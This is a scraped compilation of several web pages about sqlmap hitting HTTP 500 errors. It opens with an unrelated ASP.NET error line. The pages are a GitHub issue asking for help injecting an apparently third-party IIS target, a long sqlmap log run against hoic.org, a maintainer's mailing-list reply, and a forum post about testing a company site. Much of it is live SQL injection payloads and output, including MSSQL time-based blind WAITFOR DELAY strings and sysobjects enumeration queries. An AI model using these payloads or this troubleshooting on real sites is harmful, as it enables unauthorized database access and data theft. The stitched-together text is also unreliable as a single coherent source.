Column ‘User.UserID’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Источник

[DEBUG] got HTTP error code: 500 on boolean-based blind #607

Comments

asadmalik786 commented Feb 13, 2014

Hello , i need some help in doing blind sql injections and i’m facing this error «[DEBUG] got HTTP error code: 500 (Internal Server Error)» when sqlmap checks payloads against url.

My Target is:-
Server: Microsoft-IIS/7.5
Retrieved x-powered-by header: ASP.NET
Retrieved x-aspnet-version header: 2.0.50727

I USED THESE SWITCHES WITH SQLMAP.

-v 4 —parse-errors —banner —dbs —random-agent —level=5 —risk=3

and it shows HTTP 500 Error as shown below.
[. ]
[07:11:15] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[07:11:15] [WARNING] parsed DBMS error message: ‘System.ArgumentException: parsing «Page=2)..[«»‘]'(» — Too many )’s.’
[07:11:15] [WARNING] heuristic (basic) test shows that GET parameter ‘Page’ might not be injectable
[07:11:15] [INFO] testing for SQL injection on GET parameter ‘Page’
[07:11:15] [INFO] testing ‘AND boolean-based blind — WHERE or HAVING clause’
[07:11:15] [PAYLOAD] 2) AND 8998=5058
[..]

Target is confirm vulnerable to blind Sql Injections, bug found by acunetix and Uniscan project.kindly help me regarding this that how can i do perfect injection using sqlmap. i tried —hex but didn’t succeed.

PS : i got this from NIKTO.
Server banner has changed from ‘Microsoft-IIS/7.5’ to ‘Microsoft-HTTPAPI/2.0’ which may suggest a WAF, load balancer or proxy is in place.

waiting for your reply.

The text was updated successfully, but these errors were encountered:

Источник

Источник

[54:54:52] [DEBUG] cleaning up configuration parameters
[54:54:52] [DEBUG] setting the HTTP timeout
[54:54:52] [DEBUG] setting the HTTP User-Agent header
[54:54:52] [DEBUG] loading random HTTP User-Agent header(s) from file ‘/usr/share/sqlmap/data/txt/user-agents.txt’
[54:54:52] [INFO] fetched random HTTP User-Agent header value ‘Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.5 (KHTML, like Gecko) Safari/125.9’ from file ‘/usr/share/sqlmap/data/txt/user-agents.txt’
[54:54:52] [DEBUG] creating HTTP requests opener object
[54:54:54] [WARNING] it appears that you have provided tainted parameter values (‘id=») with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[54:54:59] [INFO] resuming back-end DBMS ‘microsoft sql server’
[54:54:59] [DEBUG] resolving hostname ‘hoic.org’
[54:55:00] [INFO] testing connection to the target URL
[54:55:00] [DEBUG] declared web page charset ‘iso-8859-1’
[54:55:00] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
[54:55:00] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own (‘ASPSESSIONIDQCTATTCR=NFPDIAFAEEF…MLJGFMAFKE’). Do you want to use those [Y/n] y
[54:55:05] [DEBUG] resuming NULL connection method ‘HEAD’
sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=’;WAITFOR DELAY ‘0:0:5’—
Vector: ;IF([INFERENCE]) WAITFOR DELAY ‘0:0:[SLEEPTIME]’—

Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF — comment)
Payload: id=’ WAITFOR DELAY ‘0:0:5’—
Vector: IF([INFERENCE]) WAITFOR DELAY ‘0:0:[SLEEPTIME]’—

[54:55:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP
back-end DBMS: Microsoft SQL Server 2012
[54:55:05] [INFO] fetching tables for database: FF_Admin
[54:55:05] [INFO] fetching number of tables for database ‘FF_Admin’
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] n
[54:55:08] [PAYLOAD] ‘ IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM FF_Admin..sysobjects WHERE FF_Admin..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>51) WAITFOR DELAY ‘0:0:5’—
[54:55:08] [WARNING] time-based comparison requires lar[54:55:08] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:08] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:09] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:09] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:09] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:10] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:10] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:11] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:11] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:11] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:11] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:12] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:12] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:12] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:12] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:12] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:13] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:13] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:13] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:13] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:14] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:14] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:14] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:14] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:14] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:15] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:15] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:15] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:15] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
.
[54:55:16] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
. (done)
[54:55:16] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
[54:55:16] [PAYLOAD] ‘ IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM FF_Admin..sysobjects WHERE FF_Admin..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>48) WAITFOR DELAY ‘0:0:5’—
[54:55:16] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[54:55:16] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
[54:55:16] [PAYLOAD] ‘ IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM FF_Admin..sysobjects WHERE FF_Admin..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>9) WAITFOR DELAY ‘0:0:5’—
[54:55:16] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
[54:55:16] [INFO] retrieved:
[54:55:16] [DEBUG] performed 3 queries in 10.99 seconds
[54:55:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch ‘—no-cast’ or switch ‘—hex’
[54:55:16] [INFO] resumed: 0
[54:55:16] [DEBUG] performed 0 queries in 0.01 seconds
[54:55:16] [CRITICAL] unable to retrieve the tables for any database
[54:55:16] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) — 34 times

Источник

  • Summary

  • Files

  • Reviews

  • Support

  • Mailing Lists

  • External Link ▾

    • Donate
    • Browse SVN

Menu

From: Miroslav Stampar <miros…@gm…> — 2011-10-09 07:34:39

 
hi.

this should be fixed some week(s) ago. could you please confirm that
you run up to date revision (svn update)?

kind regards

On Sun, Oct 9, 2011 at 12:02 AM, d33 d33 <d3...@gm...> wrote:
> I get the message "500 (Internal Server Error) - 1 times"
> whenever I try to run the SqlMap, which could be this error?
>
> [18:32:59] [INFO] testing connection to the target url
> [18:33:02] [INFO] testing if the url is stable, wait a few seconds
> [18:33:05] [INFO] url is stable
> [18:33:05] [INFO] testing if GET parameter 'id' is dynamic
> [18:33:08] [INFO] confirming that GET parameter 'id' is dynamic
> [18:33:11] [INFO] GET parameter 'id' is dynamic
> [18:33:12] [INFO] heuristic test shows that GET parameter 'id' might be
> injectable (possible DBMS: MySQL)
> [18:33:12] [INFO] testing sql injection on GET parameter 'id'
> [18:33:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [18:33:43] [CRITICAL] connection timed out to the target url or proxy,
> sqlmap is going to retry the request
> [18:33:43] [CRITICAL] unable to access item 'previousMethod'
> [18:33:43] [WARNING] HTTP error codes detected during testing:
> 500 (Internal Server Error) - 1 times
>
> [*] shutting down at: 18:33:43
>
>
> ------------------------------------------------------------------------------
> All of the data generated in your IT infrastructure is seriously valuable.
> Why? It contains a definitive record of application performance, security
> threats, fraudulent activity, and more. Splunk takes this data and makes
> sense of it. IT sense. And common sense.
> http://p.sf.net/sfu/splunk-d2dcopy2
> _______________________________________________
> sqlmap-users mailing list
> sqlma...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Miroslav Stampar
http://about.me/stamparm

View entire thread

Источник

I just started testing some of our company websites and found one of our websites that does have a sql injection problem…..  I used sqlmap to test the Vulnerability and was able to get a list of the databases (i.e. using “- — dbs”) . When I try to get list of tables from one of the listed databases on this host I get the following message “ [10:48:58] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option ‘—time-sec’ as possible (e.g. 400 or more)”.
I am using the following argument “sqlmap -u «http://website.com/Molds_Selector.aspx?mtype=BS-14%20&» -D  <database name>   —tables —time-sec 2000”  but end up getting the following error message below… Does anybody have an idea what I may be doing wrong…?

error message:
[10:53:48] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows <O/S Version>
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[10:53:48] [INFO] fetching tables for database: <DataBase Name>
[10:53:48] [INFO] fetching number of tables for database ‘<DataBase Name>’
[10:53:48] [INFO] resumed: 5
[10:53:48] [WARNING] running in a single-thread mode. Please consider usage of option ‘—threads’ for faster data retrieval
[10:53:48] [INFO] retrieved:
[10:54:02] [WARNING] reflective value(s) found and filtering out
[10:54:02] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[10:54:22] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option ‘—time-sec’ as possible (e.g. 2000 or more)
[10:54:24] [WARNING] it is very important not to stress the network adapter’s bandwidth during usage of time-based payloads

 [10:54:32] [INFO] retrieved:
[10:54:42] [INFO] retrieved:
[10:54:52] [INFO] retrieved:
[10:55:02] [INFO] retrieved:
[10:55:11] [INFO] retrieved:
[10:55:20] [INFO] retrieved:
[10:55:30] [INFO] retrieved:
[10:55:39] [INFO] retrieved:
[10:55:49] [WARNING] unable to retrieve the tables for database ‘<DataBaseName>’
[10:55:49] [CRITICAL] unable to retrieve the tables for any database
[10:55:49] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) — 70 times

[*] shutting down at 10:55:49

Источник

Понравилась статья? Поделить с друзьями:
  • Sqliteexception sqlite error no such table
  • Sqliteexception sql logic error no such table users
  • Sqlite3 как изменить тип данных столбца
  • Sqlite3 operationalerror disk i o error
  • Sqlite3 interfaceerror error binding parameter 0 probably unsupported type